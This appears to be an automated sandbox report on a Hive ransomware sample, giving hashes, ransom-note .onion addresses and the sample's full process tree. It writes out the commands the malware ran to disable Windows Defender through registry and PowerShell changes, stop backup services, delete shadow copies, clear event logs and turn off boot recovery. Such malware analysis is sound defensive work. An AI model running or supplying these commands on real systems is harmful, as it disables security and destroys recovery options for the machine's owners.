Analysis
max time kernel: 133s
max time network: 132s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
Sample: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Resource: win7-en-20211208
Behavioral task: behavioral2
Sample: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Resource: win10-en-20211208
General
Target: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Size: 2.7MB
MD5: 8486072a80d4cef5b18407ffa74a965d
SHA1: b3bbdd7d990092b8545c04bf6cea5572c1d1cb4c
SHA256: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1
SHA512: dea0bc47c7b3b178e128d2349ede55d7c13cd5884ce49a178668b9e0a527f2f415eef432a5523c8c129436e37d8a7f424ce0dbebf95b89e22a9d7a1c15c083e5
Malware Config
Extracted from: C:\JZRG_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the mpcmdrun utility to delete all AV definitions.
Processes:
PID 2128 MpCmdRun.exe

Hive
A ransomware written in Golang, first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes:
reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
PID 2064 bcdedit.exe
PID 2088 bcdedit.exe

Modifies extensions of user files (12 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
Processes:
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
PID 1080 vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
PID 2160 powershell.exe
PID 2260 powershell.exe
PID 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
Processes (indented by depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe (PID 1524), command line: "C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe"
  - Modifies extensions of user files
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe (PID 544), command line: net.exe stop "NetMsmqActivator" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 756), command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  C:\Windows\system32\net.exe (PID 752), command line: net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 568), command line: C:\Windows\system32\net1 stop "SamSs" /y
  C:\Windows\system32\net.exe (PID 304), command line: net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1416), command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  C:\Windows\system32\net.exe (PID 628), command line: net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1776), command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  C:\Windows\system32\net.exe (PID 1792), command line: net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1484), command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  C:\Windows\system32\net.exe (PID 1204), command line: net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1080), command line: C:\Windows\system32\net1 stop "VSS" /y
  C:\Windows\system32\net.exe (PID 980), command line: net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 1752), command line: C:\Windows\system32\net1 stop "wbengine" /y
  C:\Windows\system32\net.exe (PID 1476), command line: net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe (PID 2044), command line: C:\Windows\system32\net1 stop "WebClient" /y
  C:\Windows\system32\sc.exe (PID 1560), command line: sc.exe config "NetMsmqActivator" start= disabled
  C:\Windows\system32\sc.exe (PID 1172), command line: sc.exe config "SamSs" start= disabled
  C:\Windows\system32\sc.exe (PID 1984), command line: sc.exe config "SDRSVC" start= disabled
  C:\Windows\system32\sc.exe (PID 1848), command line: sc.exe config "SstpSvc" start= disabled
  C:\Windows\system32\sc.exe (PID 1084), command line: sc.exe config "UI0Detect" start= disabled
  C:\Windows\system32\sc.exe (PID 384), command line: sc.exe config "VSS" start= disabled
  C:\Windows\system32\sc.exe (PID 2028), command line: sc.exe config "wbengine" start= disabled
  C:\Windows\system32\sc.exe (PID 912), command line: sc.exe config "WebClient" start= disabled
  C:\Windows\system32\reg.exe (PID 1088), command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 568), command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  C:\Windows\system32\reg.exe (PID 1128), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1788), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1708), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 288), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 972), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1100), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 2044), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1004), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1924), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1844), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  C:\Windows\system32\reg.exe (PID 1992), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 748), command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 1988), command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  C:\Windows\system32\reg.exe (PID 1316), command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1800
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1776
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1484
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1752
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1504
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1880
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1860
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:572
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1928
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:964
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1000
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1212
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1704 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1912
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1080 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:924 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2064 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2260
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 6b820730184d27ba50fc381227baf546
SHA1 cd1fd452a86b077378113f0ab6d808f49334363c
SHA256 2def2897de0f92de4a34b0304ff7bedd70a8522d7ca47961fbfa81684f2ce90e
SHA512 3f26baa4329c23cbc84ab30213518939bacf743ef0fbd79c37508d3bb584b502b1af784bcff3b0e014882bf226c4ecb8e63111d15ce656122a39bcefb97fc4dc